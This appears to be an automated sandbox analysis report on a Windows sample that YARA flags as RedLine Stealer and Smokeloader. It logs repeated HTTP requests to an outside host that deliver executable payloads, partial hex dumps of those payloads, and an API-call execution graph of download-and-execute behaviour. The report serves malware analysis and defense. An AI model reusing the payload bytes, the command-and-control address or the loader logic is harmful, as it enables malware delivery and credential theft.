                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.749900185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:47.299411058 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:48.667067051 CET204INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:48 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.749908185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:50.860157967 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:52.183794022 CET204INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:51 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.749917185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:54.346875906 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:55.681081057 CET204INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:55 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.749928185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:58.903223991 CET394OUTGET /soft/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: d
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:10:00.389307976 CET1236INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:59 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Disposition: attachment; filename="dll";
                                                  Content-Length: 242176
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/octet-stream
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                  Dec 20, 2024 17:10:00.389434099 CET224INData Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32
                                                  Data Ascii: (v*{#{#owox(+oy*{,{ oo+{!oo(2*z,{",{"o/(z*((X[((X[((X[(q*~(-(-(***~to(
                                                  Dec 20, 2024 17:10:00.389446020 CET1236INData Raw: 33 00 00 06 02 74 13 00 00 01 17 6f b6 00 00 0a 2a 5e 28 b9 00 00 0a 72 e4 11 00 70 1b 6f ba 00 00 0a 15 31 02 17 2a 16 2a 3e 02 fe 15 10 00 00 02 02 03 7d 25 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a
                                                  Data Ascii: 3to*^(rpo1**>}%*(Co(D(E}%(F(E(&*>}**(Co(D}*(F(E(&*"*>}4*{Eorprpo(*j};({=
                                                  Dec 20, 2024 17:10:00.389549971 CET1236INData Raw: 28 b7 00 00 06 2a 46 02 7b 63 00 00 04 6f ff 00 00 0a 74 11 00 00 01 2a 62 02 7b 63 00 00 04 03 6f 00 01 00 0a 02 73 fd 00 00 0a 6f e8 00 00 0a 2a 32 02 7b 64 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 64 00 00 04 03 6f 79 00 00 0a 02 03 7d 5e 00 00 04
                                                  Data Ascii: (*F{cot*b{coso*2{dow*~{doy}^so*F{dot*b{doso*2{eo*N{eo(*2{eox*R}[{eo*{N*>oo}N*{X*:}X
                                                  Dec 20, 2024 17:10:00.389563084 CET1236INData Raw: 00 0a 2a 86 02 7b 84 00 00 04 6f 39 01 00 0a 02 28 07 01 00 06 6f 40 01 00 0a 6f 36 00 00 0a 6f 54 00 00 0a 2a 1e 02 7b 80 00 00 04 2a b6 02 7b 84 00 00 04 6f 39 01 00 0a 6f 42 01 00 0a 02 16 8d 65 00 00 01 7d 80 00 00 04 02 7b 83 00 00 04 72 a8
                                                  Data Ascii: *{o9(o@o6oT*{*{o9oBe}{rpo*2{o*6{o*2{o*f{o{o*Z{orp(*J{oo*{*6{o*2{o*6{o
                                                  Dec 20, 2024 17:10:00.389810085 CET1236INData Raw: 04 02 72 a8 0f 00 70 7d af 00 00 04 02 73 6d 01 00 0a 7d b0 00 00 04 02 28 1f 00 00 0a 02 03 7d ae 00 00 04 2a 56 02 1f 0a 7d b1 00 00 04 02 28 7d 00 00 0a 02 28 8d 01 00 06 2a 1e 02 7b b1 00 00 04 2a 22 02 03 7d b1 00 00 04 2a 1e 02 7b b2 00 00
                                                  Data Ascii: rp}sm}(}*V}(}(*{*"}*{*"}*{,(w}{(y{((t*{,{(y((u*{,{(y((*z,{,{o/(v
                                                  Dec 20, 2024 17:10:00.389822960 CET1236INData Raw: 02 6f 78 00 00 0a 6f 92 00 00 0a 2a 32 02 7b d7 00 00 04 6f bd 00 00 0a 2a 36 02 7b d7 00 00 04 03 6f c1 00 00 0a 2a 32 02 7b d7 00 00 04 6f 7c 01 00 0a 2a 36 02 7b d7 00 00 04 03 6f 7d 01 00 0a 2a 32 02 7b d7 00 00 04 6f 7e 01 00 0a 2a 36 02 7b
                                                  Data Ascii: oxo*2{o*6{o*2{o|*6{o}*2{o~*6{o*6{o&*v{rpo{o&*>{(*z,{,{o/(z*}{{(){{(){{()
                                                  Dec 20, 2024 17:10:00.389834881 CET1236INData Raw: 0a 2a 3a 02 17 7d 0d 01 00 04 02 28 6d 02 00 06 2a 3a 02 16 7d 0d 01 00 04 02 28 6d 02 00 06 2a 4a 02 7b 15 01 00 04 02 6f d2 00 00 0a 6f d3 00 00 0a 2a 4a 02 7b 15 01 00 04 02 6f 78 00 00 0a 6f 92 00 00 0a 2a 32 02 7b 15 01 00 04 6f bd 00 00 0a
                                                  Data Ascii: *:}(m*:}(m*J{oo*J{oxo*2{o*b{oso*(,(ooo(*f(ooo(*z,{,{o/(z*2}(}(}(r(
                                                  Dec 20, 2024 17:10:00.390152931 CET1236INData Raw: 6f 74 00 00 0a 2a 3a 02 7b 2f 01 00 04 02 14 6f 74 00 00 0a 2a 3a 02 7b 2e 01 00 04 02 14 6f 74 00 00 0a 2a 1e 02 7b 43 01 00 04 2a 52 02 03 7d 43 01 00 04 02 02 7b 43 01 00 04 28 29 00 00 06 2a 1e 02 7b 3e 01 00 04 2a 32 02 7b 46 01 00 04 6f 78
                                                  Data Ascii: ot*:{/ot*:{.ot*{C*R}C{C()*{>*2{Fox*6{Fo*{?*r{>,{Eoo}?*{@*r{>-{Eoo}@*B((*{C(){A({B(*J{Foxo
                                                  Dec 20, 2024 17:10:00.390165091 CET1236INData Raw: 2a 22 02 03 7d 76 01 00 04 2a 1e 02 7b 77 01 00 04 2a 22 02 03 7d 77 01 00 04 2a 1e 02 7b 78 01 00 04 2a 22 02 03 7d 78 01 00 04 2a 1e 02 7b 79 01 00 04 2a 22 02 03 7d 79 01 00 04 2a 1e 02 7b 7a 01 00 04 2a 22 02 03 7d 7a 01 00 04 2a 1e 02 7b 7b
                                                  Data Ascii: *"}v*{w*"}w*{x*"}x*{y*"}y*{z*"}z*{{*"}{*{|*"}|*{}*"}}*{~*"}~*{*"}*{*"}*{*"}*{*"}*{*"}*("
                                                  Dec 20, 2024 17:10:00.509181976 CET1236INData Raw: 2a 1e 02 7b bb 01 00 04 2a 22 02 03 7d bb 01 00 04 2a 1e 02 7b bc 01 00 04 2a 22 02 03 7d bc 01 00 04 2a 5a 02 7b c0 01 00 04 19 33 01 2a 02 28 e8 03 00 06 6f bf 00 00 0a 2a 96 02 28 e8 03 00 06 6f 73 00 00 0a 2c 0b 02 28 e8 03 00 06 6f 50 02 00
                                                  Data Ascii: *{*"}*{*"}*Z{3*(o*(os,(oP(oQ*{*"}*{*"}*{*"}*(*("?"""?""sR(*{*"}*{*"}*{


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.749935185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:10:01.394768000 CET394OUTGET /soft/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: s
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:10:02.976751089 CET1236INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:10:02 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Disposition: attachment; filename="soft";
                                                  Content-Length: 1502720
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/octet-stream
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-
                                                  Dec 20, 2024 17:10:02.976797104 CET1236INData Raw: 61 02 7b 11 00 00 04 1b 8d 3c 00 00 01 25 16 09 6f 1f 00 00 0a a2 25 17 72 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 12 00 00 04 11 05 1f 64 6a 5a 11 04
                                                  Data Ascii: a{<%o%r/p%(%r3p%(( o!{djZ[("o#83^{<%o%r/p%(%r3p%(( o!{djZ[("o#+`3\{<%o%r/p%(%r3
                                                  Dec 20, 2024 17:10:02.976835012 CET1236INData Raw: 7b 17 00 00 04 19 6f 48 00 00 0a 02 7b 17 00 00 04 16 6f 49 00 00 0a 02 7b 17 00 00 04 72 1d 02 00 70 6f 4a 00 00 0a 02 7b 17 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 17 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 17 00 00 04 72 35 02 00 70
                                                  Data Ascii: {oH{oI{rpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rKpoRtPoS{oT{oU{oV{oW{oX{oY{#oZ{o
                                                  Dec 20, 2024 17:10:02.977195978 CET1236INData Raw: 45 00 00 0a 02 7b 08 00 00 04 72 39 03 00 70 6f 21 00 00 0a 02 7b 09 00 00 04 28 46 00 00 0a 6f 47 00 00 0a 02 7b 09 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 09 00 00 04 19 6f 48 00 00 0a 02 7b 09 00 00 04 16 6f 49 00 00 0a 02 7b 09 00 00 04
                                                  Data Ascii: E{r9po!{(FoG{(<o9{oH{oI{rqpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rypoRtPoS{oT{oU{oV{oW
                                                  Dec 20, 2024 17:10:02.977230072 CET1236INData Raw: 7b 0b 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 0b 00 00 04 72 47 04 00 70 6f 42 00 00 0a 02 7b 0b 00 00 04 20 2c 05 00 00 20 81 00 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 0b 00 00 04 1e 6f 45 00 00 0a 02 7b 0b 00 00 04 02 fe 06
                                                  Data Ascii: {s@oA{rGpoB{ , sCoD{oE{skol{oi{rUp"@AsOoP{Es>o?{s@oA{rwpoB{ #sCoD{oE{rpo!
                                                  Dec 20, 2024 17:10:02.977281094 CET1236INData Raw: 0f 00 00 04 28 76 00 00 0a 6f 77 00 00 0a 02 7b 0f 00 00 04 20 67 02 00 00 1f 34 73 43 00 00 0a 6f 44 00 00 0a 02 7b 0f 00 00 04 1f 0d 6f 45 00 00 0a 02 7b 0f 00 00 04 16 6f 23 00 00 0a 02 7b 14 00 00 04 17 6f 69 00 00 0a 02 7b 14 00 00 04 72 35
                                                  Data Ascii: (vow{ g4sCoD{oE{o#{oi{r5p"dAsOoP{ s>o?{s@oA{rpoB{ *sCoD{oE{r-po!{(so9{ot
                                                  Dec 20, 2024 17:10:02.977385044 CET776INData Raw: 02 7b 1a 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 1a 00 00 04 72 21 07 00 70 6f 42 00 00 0a 02 7b 1a 00 00 04 20 25 01 00 00 20 ee 00 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 1a 00 00 04 1a 6f 6f 00 00 0a 02 7b 1a 00 00 04 1b 6f
                                                  Data Ascii: {s@oA{r!poB{ % sCoD{oo{op{oq{or{sgoh"A"As(( WsC((:{o;(:{o;(:{o;(
                                                  Dec 20, 2024 17:10:02.977420092 CET1236INData Raw: 00 04 6f 34 00 00 0a 02 7b 28 00 00 04 6f 34 00 00 0a 02 7b 2c 00 00 04 6f 35 00 00 0a 02 28 34 00 00 0a 02 7b 1c 00 00 04 1b 6f 36 00 00 0a 02 7b 1c 00 00 04 02 6f 37 00 00 0a 02 7b 1d 00 00 04 28 6a 00 00 0a 6f 39 00 00 0a 02 7b 1d 00 00 04 6f
                                                  Data Ascii: o4{(o4{,o5(4{o6{o7{(jo9{o:{o;{o:{o;{o:{ o;{(<o={s>o?{s@oA{rGpoB{ sCoD{
                                                  Dec 20, 2024 17:10:02.977529049 CET1236INData Raw: 19 16 73 4f 00 00 0a 6f 50 00 00 0a 02 7b 27 00 00 04 28 3c 00 00 0a 6f 51 00 00 0a 02 7b 27 00 00 04 06 72 4b 02 00 70 6f 52 00 00 0a 74 50 00 00 01 6f 53 00 00 0a 02 7b 27 00 00 04 14 6f 54 00 00 0a 02 7b 27 00 00 04 14 6f 55 00 00 0a 02 7b 27
                                                  Data Ascii: sOoP{'(<oQ{'rKpoRtPoS{'oT{'oU{'oV{'oW{'oX{'oY{'#oZ{'o[{'#V@o\{'o]{' s>o?{'s@oA{'r
                                                  Dec 20, 2024 17:10:02.977564096 CET1236INData Raw: 4c 00 00 0a 02 7b 25 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 25 00 00 04 72 35 02 00 70 22 00 00 04 41 16 19 16 73 4f 00 00 0a 6f 50 00 00 0a 02 7b 25 00 00 04 28 3c 00 00 0a 6f 51 00 00 0a 02 7b 25 00 00 04 06 72 79 03 00 70 6f 52 00 00 0a
                                                  Data Ascii: L{%(MoN{%r5p"AsOoP{%(<oQ{%rypoRtPoS{%oT{%oU{%oV{%oW{%oX{%oY{%#oZ{%o[{%#V@o\{%o]{% s>
                                                  Dec 20, 2024 17:10:03.096767902 CET1236INData Raw: 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 2b 00 00 04 72 6f 07 00 70 6f 42 00 00 0a 02 7b 2b 00 00 04 1f 70 1f 23 73 43 00 00 0a 6f 44 00 00 0a 02 7b 2b 00 00 04 18 6f 45 00 00 0a 02 7b 2b 00 00 04 72 7f 07 00 70 6f 21 00 00 0a 02 7b 2b
                                                  Data Ascii: s@oA{+ropoB{+p#sCoD{+oE{+rpo!{+o{+,sgoh{* *s>o?{*s@oA{*rpoB{* tsCoD{*oE{)oi{)rp"@A


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:11:08:17
                                                  Start date:20/12/2024
                                                  Path:C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\3K6rBUOQ2z.exe"
                                                  Imagebase:0x400000
                                                  File size:1'922'560 bytes
                                                  MD5 hash:CD064ED63EB478D56C93D52CFE887DC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2703351422.0000000000F89000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:12:56:18
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1548
                                                  Imagebase:0xe60000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:2.5%
                                                    Dynamic/Decrypted Code Coverage:20.1%
                                                    Signature Coverage:11.6%
                                                    Total number of Nodes:1104
                                                    Total number of Limit Nodes:23
                                                    execution_graph 36990 10001f20 37033 10005956 GetSystemTimeAsFileTime 36990->37033 36992 10001f48 37035 100059d5 36992->37035 36994 10001f4f __CreateFrameInfo 37038 10001523 36994->37038 36996 10002174 37068 100010a3 36996->37068 37001 10002025 37071 10001cdd 49 API calls __EH_prolog3_GS 37001->37071 37004 1000202e 37005 10002164 37004->37005 37072 100059b4 37 API calls _unexpected 37004->37072 37007 10001bb9 25 API calls 37005->37007 37009 10002172 37007->37009 37008 10002040 37073 10001c33 39 API calls 37008->37073 37009->36996 37011 10002052 37074 10002493 27 API calls __InternalCxxFrameHandler 37011->37074 37013 1000205f 37075 10002230 27 API calls __InternalCxxFrameHandler 37013->37075 37015 10002079 37076 10002230 27 API calls __InternalCxxFrameHandler 37015->37076 37017 1000209f 37077 1000219f 27 API calls __InternalCxxFrameHandler 37017->37077 37019 100020a9 37078 10001bb9 37019->37078 37022 10001bb9 25 API calls 37023 100020bb 37022->37023 37024 10001bb9 25 API calls 37023->37024 37025 100020c4 37024->37025 37082 10001725 8 API calls _ValidateLocalCookies 37025->37082 37027 100020df __CreateFrameInfo 37028 10002100 CreateProcessA 37027->37028 37029 10002135 37028->37029 37030 1000213c ShellExecuteA 37028->37030 37029->37030 37031 1000215b 37029->37031 37030->37031 37032 10001bb9 25 API calls 37031->37032 37032->37005 37034 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 37033->37034 37034->36992 37083 10006e9c GetLastError 37035->37083 37039 1000152f __EH_prolog3_GS 37038->37039 37128 1000184b 37039->37128 37042 10001593 37132 1000190a 37042->37132 37043 100015ff 37137 1000179a 37043->37137 37044 10001541 37044->37042 37049 1000179a 27 API calls 37044->37049 37046 1000160d 37142 10005939 37046->37142 37049->37042 37050 10001650 InternetSetOptionA InternetConnectA 37052 10001692 HttpOpenRequestA 37050->37052 37053 100016e8 InternetCloseHandle 37050->37053 37051 100016eb 37054 10001704 37051->37054 37191 10001bdc 25 API calls 37051->37191 37055 100016e2 InternetCloseHandle 37052->37055 37056 100016bc 37052->37056 37053->37051 37058 10001bb9 25 API calls 37054->37058 37055->37053 37145 100010c7 37056->37145 37060 1000171b 37058->37060 37192 1000e8a5 37060->37192 37064 100016d3 37159 10001175 37064->37159 37065 100016df InternetCloseHandle 37065->37055 37069 100010ad 37068->37069 37070 100010bd CoUninitialize 37069->37070 37071->37004 37072->37008 37073->37011 37074->37013 37075->37015 37076->37017 37077->37019 37079 10001bc4 37078->37079 37080 10001bcc 37078->37080 37243 10001bdc 25 API calls 37079->37243 37080->37022 37082->37027 37084 10006eb3 37083->37084 37085 10006eb9 37083->37085 37113 10007580 6 API calls _unexpected 37084->37113 37089 10006ebf SetLastError 37085->37089 37114 100075bf 6 API calls _unexpected 37085->37114 37088 10006ed7 37088->37089 37090 10006edb 37088->37090 37096 10006f53 37089->37096 37097 100059df 37089->37097 37115 10007aa7 14 API calls 2 library calls 37090->37115 37092 10006ee7 37094 10006f06 37092->37094 37095 10006eef 37092->37095 37123 100075bf 6 API calls _unexpected 37094->37123 37116 100075bf 6 API calls _unexpected 37095->37116 37126 10006928 37 API calls __CreateFrameInfo 37096->37126 37097->36994 37102 10006f12 37103 10006f16 37102->37103 37104 10006f27 37102->37104 37124 100075bf 6 API calls _unexpected 37103->37124 37125 10006c9e 14 API calls _unexpected 37104->37125 37108 10006efd 37117 10007a3c 37108->37117 37109 10006f32 37111 10007a3c _free 14 API calls 37109->37111 37110 10006f03 37110->37089 37112 10006f39 37111->37112 37112->37089 37113->37085 37114->37088 37115->37092 37116->37108 37118 10007a70 __dosmaperr 37117->37118 37119 10007a47 RtlFreeHeap 37117->37119 37118->37110 37119->37118 37120 10007a5c 37119->37120 37127 10005926 14 API calls __dosmaperr 37120->37127 37122 10007a62 GetLastError 37122->37118 37123->37102 37124->37108 37125->37109 37127->37122 37129 10001868 37128->37129 37129->37129 37130 1000190a 27 API calls 37129->37130 37131 1000187c 37130->37131 37131->37044 37133 10001978 37132->37133 37136 10001920 __InternalCxxFrameHandler 37132->37136 37195 10001a59 27 API calls std::_Xinvalid_argument 37133->37195 37136->37043 37138 100017b3 __InternalCxxFrameHandler 37137->37138 37139 100017eb 37137->37139 37138->37046 37196 10001884 27 API calls 37139->37196 37197 100070ee 37142->37197 37146 100010d3 __EH_prolog3_GS 37145->37146 37147 1000184b 27 API calls 37146->37147 37148 100010e3 HttpAddRequestHeadersA 37147->37148 37223 100017f1 37148->37223 37150 10001112 HttpAddRequestHeadersA 37151 100017f1 27 API calls 37150->37151 37152 10001132 HttpAddRequestHeadersA 37151->37152 37153 100017f1 27 API calls 37152->37153 37154 10001152 HttpAddRequestHeadersA 37153->37154 37155 10001bb9 25 API calls 37154->37155 37156 1000116d 37155->37156 37157 1000e8a5 5 API calls 37156->37157 37158 10001172 HttpSendRequestA 37157->37158 37158->37064 37158->37065 37160 10001184 __EH_prolog3_GS 37159->37160 37161 100011c5 InternetSetFilePointer 37160->37161 37162 100011e3 InternetReadFile 37161->37162 37169 1000121d __InternalCxxFrameHandler 37162->37169 37163 10001260 __CreateFrameInfo 37164 1000127d HttpQueryInfoA 37163->37164 37165 100012a6 CoCreateInstance 37164->37165 37166 1000150a 37164->37166 37165->37166 37167 100012d8 37165->37167 37168 1000e8a5 5 API calls 37166->37168 37167->37166 37171 1000184b 27 API calls 37167->37171 37170 10001520 37168->37170 37169->37162 37169->37163 37170->37065 37172 100012f7 37171->37172 37228 10001006 30 API calls 37172->37228 37174 1000130c 37175 10001bb9 25 API calls 37174->37175 37181 1000134f __CreateFrameInfo 37175->37181 37176 1000149d 37232 10005926 14 API calls __dosmaperr 37176->37232 37178 100014ae __InternalCxxFrameHandler 37178->37166 37179 10001427 __InternalCxxFrameHandler 37179->37176 37179->37178 37182 100014aa __CreateFrameInfo 37179->37182 37180 100014a2 37234 1000584c 25 API calls __strnicoll 37180->37234 37181->37178 37181->37179 37185 10001456 37181->37185 37186 10001449 37181->37186 37182->37178 37233 10005926 14 API calls __dosmaperr 37182->37233 37185->37179 37230 10005926 14 API calls __dosmaperr 37185->37230 37229 10005926 14 API calls __dosmaperr 37186->37229 37188 1000144e 37231 1000584c 25 API calls __strnicoll 37188->37231 